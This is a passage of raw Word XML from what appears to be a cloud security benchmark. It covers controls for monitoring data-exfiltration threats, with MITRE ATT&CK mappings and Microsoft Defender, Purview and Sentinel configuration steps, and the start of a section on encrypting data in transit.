        <w:t>Integrate classification metadata with downstream controls: configure Data Loss Prevention (DLP) policies in Microsoft Purview, apply conditional access rules in Entra ID, and enforce encryption policies based on sensitivity labels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518C9E92" w14:textId="198C51DA" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:lastRenderedPageBreak/>
        <w:t>Establish a regular scanning schedule to continuously discover newly created or modified sensitive data assets as your data estate evolves</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC7520A" w14:textId="5712A244" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="00CD3C08">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc242449503"/>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>DP-2: Monitor anomalies and threats targeting sensitive data</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="5F6D69AB" w14:textId="51731D2A" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBAD654" w14:textId="22ECF704" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Monitor sensitive data access and transfer activities for anomalies that indicate unauthorized exfiltration, insider threats, or compromised accounts. Use behavioral baselines and data sensitivity context to detect unusual patterns such as large transfers, abnormal access times, or unexpected data movement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13CC5810" w14:textId="63D27EE3" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3DC7C32F" w14:textId="2F102FEC" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Silent exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A52C56C" w14:textId="3B329FA9" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Bulk exports, large result sets, or incremental siphoning proceed undetected due to lack of baselines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E97881" w14:textId="409CF3CC" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Insider misuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53164A7A" w14:textId="4DB52E4A" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Legitimate credentials perform unusual sequences (time-of-day, volume, locality) that bypass coarse monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6C9885" w14:textId="1AD8CB01" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Staging &amp; enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D388C61" w14:textId="0456CA8D" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Attackers map schemas / labels to prioritize high-value targets before mass extraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2BBF1E" w14:textId="76AACF3D" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Living-off-the-land queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723F8A2F" w14:textId="7F255DF1" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Standard administrative tools mask reconnaissance in normal operational noise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FA8784" w14:textId="469DCB5A" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Cross-store evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41682F59" w14:textId="434776B0" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="102"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Distributed access across multiple services avoids single-store thresholds and correlation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320B0529" w14:textId="7004F3F4" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="104"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB903BC" w14:textId="450BD41D" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Collection (TA0009)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAE73D1" w14:textId="59DF53D7" w:rsidR="008C7D31" w:rsidRDefault="008C7D31" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="379"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="008C7D31">
        <w:t>data from cloud storage (T1530) via anomalous bulk or wide fan-out reads across sensitive containers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3D3F69" w14:textId="0FA9E394" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50960406" w14:textId="4080A850" w:rsidR="008C7D31" w:rsidRDefault="008C7D31" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="379"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="008C7D31">
        <w:t>valid accounts (T1078) abusing compromised or insider credentials to blend with legitimate traffic baselines.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD9E069" w14:textId="2D768835" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EC71CB" w14:textId="73FFFC70" w:rsidR="008C7D31" w:rsidRDefault="008C7D31" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="379"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="008C7D31">
        <w:t>automated exfiltration (T1020) using scripted, throttled queries engineered to avoid alert thresholds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328F8488" w14:textId="5147BB3C" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED3B07B" w14:textId="5E54F4A6" w:rsidR="008C7D31" w:rsidRDefault="008C7D31" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="379"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="008C7D31">
        <w:t>exfiltration to cloud storage (T1567.002) staging data in attacker-controlled regions or accounts for later retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD25338" w14:textId="5C2C83BF" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:lastRenderedPageBreak/>
        <w:t>Command &amp; Control / Exfiltration (TA0011/TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69049958" w14:textId="137A374B" w:rsidR="008C7D31" w:rsidRDefault="008C7D31" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="379"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="008C7D31">
        <w:t>application layer protocol (T1071) tunneling sensitive rows via normal DB/API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D022D80" w14:textId="56E42265" w:rsidR="00CD3C08" w:rsidRDefault="00CD3C08" w:rsidP="00CA7928">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00CD3C08">
        <w:t>Discovery (TA0007)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E6A361" w14:textId="1EF0BB03" w:rsidR="008C7D31" w:rsidRDefault="008C7D31" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="379"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="008C7D31">
        <w:t>system / service discovery (T1082, T1046) enumerating endpoints to chart lateral movement paths to higher-value stores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145740DC" w14:textId="7F950FD3" w:rsidR="004658F6" w:rsidRDefault="004658F6" w:rsidP="004658F6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004658F6">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>DP-2.1: Enable threat detection for data services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B3EA2D" w14:textId="5CDFBAB9" w:rsidR="004658F6" w:rsidRDefault="004658F6" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004658F6">
        <w:t>Deploy Microsoft Defender services to provide real-time threat detection and anomaly monitoring across your data storage and database platforms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA40BFB" w14:textId="0285B4C3" w:rsidR="004658F6" w:rsidRDefault="004658F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004658F6">
        <w:t>Enable threat detection for data services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDA9F65" w14:textId="0C070CDF" w:rsidR="004658F6" w:rsidRDefault="004658F6" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004658F6">
        <w:t>Enable Microsoft Defender for Storage with malware scanning and sensitive data threat detection to monitor anomalous access patterns, unusual upload/download volumes, and potential data exfiltration attempts across Azure Storage accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F1483EC" w14:textId="212BDC28" w:rsidR="004658F6" w:rsidRDefault="004658F6" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004658F6">
        <w:t>Enable Microsoft Defender for SQL to detect suspicious database activities including SQL injection attempts, anomalous query patterns, unusual data export operations, and access from unfamiliar locations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADCE4D8" w14:textId="069383E6" w:rsidR="004658F6" w:rsidRDefault="004658F6" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004658F6">
        <w:t>Enable Microsoft Defender for Azure Cosmos DB to detect anomalous database access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43527855" w14:textId="6BB64835" w:rsidR="004658F6" w:rsidRDefault="004658F6" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004658F6">
        <w:t>For open-source databases (PostgreSQL, MySQL), enable Microsoft Defender for open-source relational databases to detect brute-force attacks, suspicious access patterns, and anomalous administrative operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A4532A" w14:textId="0E01B6C2" w:rsidR="004658F6" w:rsidRPr="004658F6" w:rsidRDefault="004658F6" w:rsidP="004658F6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004658F6">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>DP-2.2: Monitor and prevent data exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FC3F10" w14:textId="40B6EB47" w:rsidR="004658F6" w:rsidRDefault="004658F6" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004658F6">
        <w:t>Implement proactive data loss prevention controls and behavioral monitoring to detect and block unauthorized data transfers before they succeed.</w:t>
      </w:r>
      <w:r w:rsidR="008C7D31" w:rsidRPr="008C7D31">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:color w:val="161616"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C7D31" w:rsidRPr="008C7D31">
        <w:t>Combine policy-based DLP with insider risk management, SIEM correlation, and automated response to create a defense-in-depth approach that stops exfiltration attempts across multiple channels while providing forensic evidence for incident investigation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0715AA3A" w14:textId="49D9DEE7" w:rsidR="004658F6" w:rsidRDefault="004658F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004658F6">
        <w:t>Deploy DLP and insider risk controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7120DF" w14:textId="5D9397F4" w:rsidR="004658F6" w:rsidRDefault="004658F6" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004658F6">
        <w:t>Use Microsoft Purview Data Loss Prevention (DLP) policies to prevent sensitive data exfiltration by monitoring and blocking unauthorized transfers of classified data across Azure services, Microsoft 365, and endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAF8B67" w14:textId="4A7845FE" w:rsidR="004658F6" w:rsidRDefault="004658F6" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004658F6">
        <w:t xml:space="preserve">Deploy Microsoft Purview Insider Risk Management to detect risky user behaviors using machine learning and behavioral analytics. Monitor indicators including unusual data downloads, copying files to USB/personal cloud storage, accessing sensitive resources outside normal working hours, or data access </w:t>
      </w:r>
      <w:r w:rsidRPr="004658F6">
        <w:lastRenderedPageBreak/>
        <w:t>spikes before resignation dates. Insider Risk Management correlates signals from Microsoft 365, Azure, HR systems, and security tools to identify potential data theft or policy violations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03473A98" w14:textId="1B44D3E0" w:rsidR="004658F6" w:rsidRDefault="004658F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="106"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004658F6">
        <w:t>Configure monitoring and response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5DC1F1" w14:textId="5326E21C" w:rsidR="004658F6" w:rsidRDefault="004658F6" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004658F6">
        <w:t>Configure diagnostic logs for data services and route them to Azure Monitor or Microsoft Sentinel to establish behavioral baselines and detect deviations from normal access patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E381B2" w14:textId="4CD04E9E" w:rsidR="004658F6" w:rsidRDefault="004658F6" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004658F6">
        <w:t>Integrate data service logs with Microsoft Sentinel to create analytics rules for detecting anomalous data access patterns such as bulk downloads, off-hours access, or suspicious query behaviors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C54D82E" w14:textId="4F1098E5" w:rsidR="004658F6" w:rsidRDefault="004658F6" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004658F6">
        <w:t>Implement automated incident response workflows using Azure Logic Apps or Microsoft Sentinel playbooks to isolate compromised identities, revoke access, and notify security teams when data exfiltration attempts are detected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23748928" w14:textId="77777777" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="005305F2"/>
    <w:p w14:paraId="1FA3CD0E" w14:textId="77777777" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="005305F2"/>
    <w:p w14:paraId="5DB374F8" w14:textId="77777777" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="005305F2"/>
    <w:p w14:paraId="07937CBE" w14:textId="77777777" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="005305F2"/>
    <w:p w14:paraId="71C6D7B5" w14:textId="33528A89" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="005305F2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc242449504"/>
      <w:r w:rsidRPr="005305F2">
        <w:t>Protect data with encryption</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="75875CCB" w14:textId="50423C94" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="005305F2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc242449505"/>
      <w:r w:rsidRPr="005305F2">
        <w:t>DP-3: Encrypt sensitive data in transit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="574BDD74" w14:textId="21CC05A8" w:rsidR="005305F2" w:rsidRDefault="005305F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE6842B" w14:textId="28DD3548" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Protect data in transit using strong encryption (such as TLS 1.2 or later) to prevent interception, tampering, and unauthorized access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A5A97F" w14:textId="49E0C20B" w:rsidR="005305F2" w:rsidRDefault="005305F2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="107"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005305F2">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="44B57BA6" w14:textId="0C5CA031" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Passive interception</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6259A5C4" w14:textId="2F379EE1" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Network observers capture credentials, tokens, API payloads, or regulated data in plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CADB99" w14:textId="69D66C15" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Man-in-the-middle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50349ED6" w14:textId="4079BCF9" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Attackers alter queries, inject payloads, or harvest session material.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CB94D6" w14:textId="794CE13C" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="005305F2">
        <w:t>Protocol downgrade</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14827D63" w14:textId="23A994A1" w:rsidR="005305F2" w:rsidRDefault="005305F2" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
